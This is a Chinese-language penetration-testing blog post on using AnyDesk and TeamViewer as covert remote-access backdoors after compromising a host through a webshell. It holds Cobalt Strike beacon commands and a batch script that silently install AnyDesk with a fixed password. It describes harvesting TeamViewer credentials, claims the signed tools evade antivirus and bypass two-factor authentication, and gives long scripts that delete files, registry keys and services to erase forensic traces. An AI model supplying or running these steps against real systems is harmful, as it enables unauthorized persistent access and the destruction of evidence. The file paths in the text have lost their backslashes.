AnyDesk和TeamViewer在渗透测试中的应用

渗透技巧 3年前 (2021) admin

936 0 0

声明：该公众号大部分文章来自作者日常学习笔记，也有少部分文章是经过原作者授权和其他公众号白名单转载，未经授权，严禁转载，如需转载，联系开白。

请勿利用文章内的相关技术从事非法测试，如因此产生的一切不良后果与文章作者和本公众号无关。

0x01 前言

假设已经通过某漏洞拿到目标主机的Webshell权限，这时可以先看下里边是否安装的有以下这些第三方软件，它们可以不用通过Mstsc.exe即可进行远程桌面连接。

向日葵；ToDesk；AnyDesk；TeamViewer；Radmin；RealVNC；PcAnywhere；[...SNIP...]

利用向日葵/ToDesk/AnyDesk/TeamViewer等第三方软件进入远程桌面时需要使用Administrators权限来执行，而Radmin/RealVNC/PcAnywhere只需找到连接密码即可。

相关阅读：

向日葵软件在渗透测试中的应用（直接点击即可访问）

https://www.yuque.com/docs/share/cfe594e5-4831-4a97-8dab-28848fe91640?#（密码：hist）

0x02 应用场景

AnyDesk与TeamViewer等这类软件都具备内网穿透、文件传输、流量加密等功能，而且它们有数字签名，所以大部分杀毒软件都不会对其进行查杀，在远程桌面连接中可应用场景包括但不限于以下几点。

1) Windows RDP远程桌面连接登录限制；2) 某狗、盾、锁、神等计算机名和IP认证；3) Duo Security RDP等双因素身份验证；[...SNIP...]

0x03 AnyDesk利用方式

首先在本地执行AnyDesk并设置下“为自主访问设置密码”，AnyDesk目录下会生成一些配置文件用来存储我们的ID、Pass、Key和证书等数据，这里记好我们的ID和设置好的Pass，用于后期连接目标机器上的AD，执行过程中不会有UAC弹窗。

接着把AnyDesk上传至目标磁盘，创建%userprofile%AppDataRoamingAnyDesk目录，然后将我们本地的service.conf配置文件上传进去以后再执行AD即可，这个文件是用来给AD设置一个固定的连接ID和Pass。

beacon> shell md %userprofile%AppDataRoamingAnyDeskbeacon> shell C:ProgramDataAnyDesk.exe

注：本地用AnyDesk连接目标时必须先删除%userprofile%AppDataRoamingAnyDesk目录下的所有文件，然后重新执行AD，因为只有这样AD才会重新分配一个新的ID给我们，必须与原ID不一样才可以连接目标机器，否则可能会连接到我们本地机器。

或者我们可以在命令行直接执行以下批处理文件进行静默安装并设置固定连接密码，接着通过–get-id参数获取AD的连接ID，如果在获取不到连接ID时可以尝试在choice中增加延迟。

@echo offAnyDesk.exe --install "C:ProgramDataAnyDesk" --silentecho licence_keyABC | "C:ProgramDataAnyDeskAnyDesk.exe" --register-licenceecho anydesk!@# | "C:ProgramDataAnyDeskAnyDesk.exe" --set-passwordchoice /t 10 /d y /n >nulfor /f "delims=" %%i in ('anydesk --get-id') do set CID=%%iecho Connection ID Is: %CID%

可能需要清理的痕迹：

@echo offtaskkill /f /im AnyDesk.exedel /s /q %userprofile%AppDataRoamingAnyDesk*.*rmdir /s /q %userprofile%AppDataRoamingAnyDeskrmdir /s /q "%userprofile%AppDataRoamingApple Computer"rmdir /s /q %userprofile%VideosAnyDeskrmdir /s /q %userprofile%PicturesAnyDeskdel /s /q %userprofile%RecentAnyDesk.lnkdel /s /q %userprofile%AppDataRoamingMicrosoftWindowsRecentAnyDesk*.lnkdel /s /q C:WindowsPrefetchANYDESK*.pftaskkill /f /im AnyDesk.exermdir /s /q C:ProgramDataAnyDeskreg delete "HKCRAnyDesk" /freg delete "HKCR.anydesk" /freg delete "HKLMSOFTWAREClassesAnyDesk" /freg delete "HKLMSOFTWAREClientsMediaAnyDesk" /freg delete "HKLMSYSTEMControlSet001ServicesAnyDesk" /freg delete "HKLMSOFTWAREWow6432NodeMicrosoftWindowsCurrentVersionUninstallAnyDesk" /fsc delete AnyDeskdel /s /q AnyDesk.exe[...SNIP...]

0x04 TeamViewer利用方式

通过以下命令查看目标机器TV绝对路径，也可以自己上传一个免安装版TV并执行，然后再用TeamViewer利用工具获取它的连接ID和Pass。

在执行过程中可能会出现UAC弹窗，这里不管我们选择是或者否都会运行，但这种方式在实战中动静还是太大了。

tasklist /svc | findstr "TeamViewer" & sc qc TeamViewerwmic process where name="TeamViewer.exe" get processid,name,executablepathTeamViewer ID：1 118 357 536  -  TeamViewer Pass：7224

大部分利用工具原理都是在TeamViewer.exe进程的窗体句柄或内存中找到的ID和Pass。

或者我们可以在执行TV后通过使用Meterpreter和CobaltStrike中的screenshot命令截取目标机器桌面得到TeamViewer的连接ID和Pass。

可能需要清理的痕迹：

@echo offtaskkill /f /im TeamViewer.exe /im tv_w32.exe /im tv_x64.exerd /s /q C:WindowsTempTeamViewerPortablerd /s /q "%ProgramFiles%TeamViewer"rd /s /q "%ProgramFiles(x86)%TeamViewer"rd /s /q %userprofile%AppDataRoamingTeamViewerrd /s /q %userprofile%AppDataLocalTeamViewerrd /s /q %userprofile%AppDataLocalTempTeamViewerrd /s /q %userprofile%AppDataLocalTemp1TeamViewerrd /s /q %userprofile%AppDataLocalTemp1TeamViewerPortabledel /s /q %userprofile%AppDataRoamingMicrosoftWindowsRecentTeamViewer*.lnkdel /s /q C:WindowsFontsteamviewer*.otfdel /s /q C:WindowsPrefetchTeamViewer*.pfdel /s /q C:ProgramDataIntelShaderCacheTeamViewer*sc delete TeamViewer[...SNIP...]